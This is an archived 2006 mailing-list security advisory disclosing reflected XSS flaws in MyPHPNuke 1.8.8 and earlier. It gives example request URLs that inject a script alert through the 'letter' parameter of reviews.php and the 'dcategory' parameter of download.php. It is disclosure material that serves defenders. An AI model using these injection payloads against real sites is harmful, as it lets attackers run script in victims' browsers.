lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060224182459.38xoqab7yim844wg@webmail.nukedx.com> Date: Fri Feb 24 16:38:57 2006 From: nukedx at nukedx.com (nukedx@...edx.com) Subject: Advisory: MyPHPNuke <= 1.8.8 multiple XSS vulnerabilities --Security Report-- Advisory: MyPHPNuke <= 1.8.8 multiple XSS vulnerabilities --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 24/02/06 05:56 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx@...edx.com Web: http://www.nukedx.com } --- Vendor: MPN (www.myphpnuke.com) Version: 1.8.8 and prior versions must be affected. About: Via this method remote attacker can make malicious links for clicking and when victim clicks this links victim's browser would be inject with XSS. Level: Harmless --- How&Example: GET -> http://[site]/reviews.php?op=reviews&letter=[XSS] EXAMPLE -> http://[site]/reviews.php?op=reviews&letter=<script>alert('X');</script> GET -> http://[site]/download.php?sortby=&dcategory=[XSS]&sortby= EXAMPLE -> http://[site]/download.php?sortby=&dcategory=<script>alert('X');</script> -- Timeline: * 24/02/2006: Vulnerability found. * 24/02/2006: Contacted with vendor and waiting reply. -- Original advisory: http://www.nukedx.com/?viewdoc=12